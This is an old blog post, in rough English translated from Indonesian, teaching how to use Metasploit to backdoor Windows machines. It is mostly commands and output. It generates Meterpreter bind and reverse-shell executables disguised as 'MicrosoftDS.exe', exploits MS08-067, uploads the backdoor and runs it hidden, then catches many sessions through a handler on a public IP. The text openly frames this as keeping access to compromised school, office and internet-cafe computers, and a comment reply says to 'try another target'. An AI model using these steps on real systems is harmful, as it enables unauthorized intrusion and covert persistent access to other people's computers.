»Unlabelled » Metasploit to backdooring

Metasploit to backdooring

Diposting oleh fitri-ariyanto on Monday, May 11, 2009

May already have some of the metasploit that can be used to create a backdoor.
Use of this backdoor is very useful, especially as post-Exploitation method. At the time this example we will use the 2 basic methods to get the shell from the target, namely bind_tcp and reverse_tcp.
To bind_tcp, akan backdoor running on the target terget akan open the port on the system itself. So that after the exploitation process is complete, we can enter at any time to the target by using the port has been opened by the backdoor.


$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread


Backdoor will open a port on the 4321 target 10.10.96.143. How is the process running up to our backdoor, backdoor can be planted and executed after the process is complete exploitation of the target as follows:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading  : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded   : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.


At the next time, we can go to the target machine without doing exploitation back, simply by opening the connection on the port that has been defined next.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >



Second method uses reverse shell, reverse shell is used especially when the target network is limited by the firewall so that it can not open a connection to any port (typical internal network). So if you have the opportunity for hacking to a machine in the internal network (eg: computer school, computer office, computer cafe, etc) and still want to get shell access at any time and anywhere can take advantage of multi-handler to accept metasploit reverse shell. We can setup a multi-handler in the machinery that can be accessed from anywhere on the internet, for example: hosting machine, or server engine results rampokan, etc..


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description 
   ----  ---------------  --------  ----------- 


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description                         
   ----      ---------------  --------  -----------                         
   EXITFUNC  seh              yes       Exit technique: seh, thread, process 
   LHOST                      yes       The local address                   
   LPORT     4444             yes       The local port                       


Exploit target:

   Id  Name           
   --  ----           
   0   Wildcard Target 


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler..


Then create a backdoor to live with reverse_shell category:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit


And when the run (run through the post-session exploitation or run manually via double-click the mouse razz), on a multi-handler will appear:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >


Wow, using a multi-handler metasploit is we can have multiple sessions at once, for the above example can be seen a multi-handler that has been set ExitOnSession == false reverse_shell can menghandle many at once. And we can interact with the session-session at any time we want to:


msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel                             
  --  -----------  ------                             
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831 
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836 
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838 
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840 
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845 
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846 
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847 

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS      : Windows XP (Build 2600, ).


That is some of the metasploit for example backdooring, many examples of other creative kiddies, especially the smell and evil-in-mind. Oh yes, in the example above I use the payload meterpreter many times. The discussion about meterpreter akan do next.
-----
thank'to:
echo, xcode, jasakom, mildnet, newhack etc..

copyleft@echo.or.id
AT Monday, May 11, 2009

{ 2 COMMENTS... read them below or add one }

manshoezz said...

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.

can explain that???

31 December 2009 at 22:33
fitri-ariyanto said...

Exploit completed, but no session was created.

this mean, so unlucky man.. haha try another target

18 November 2013 at 01:29

Post a Comment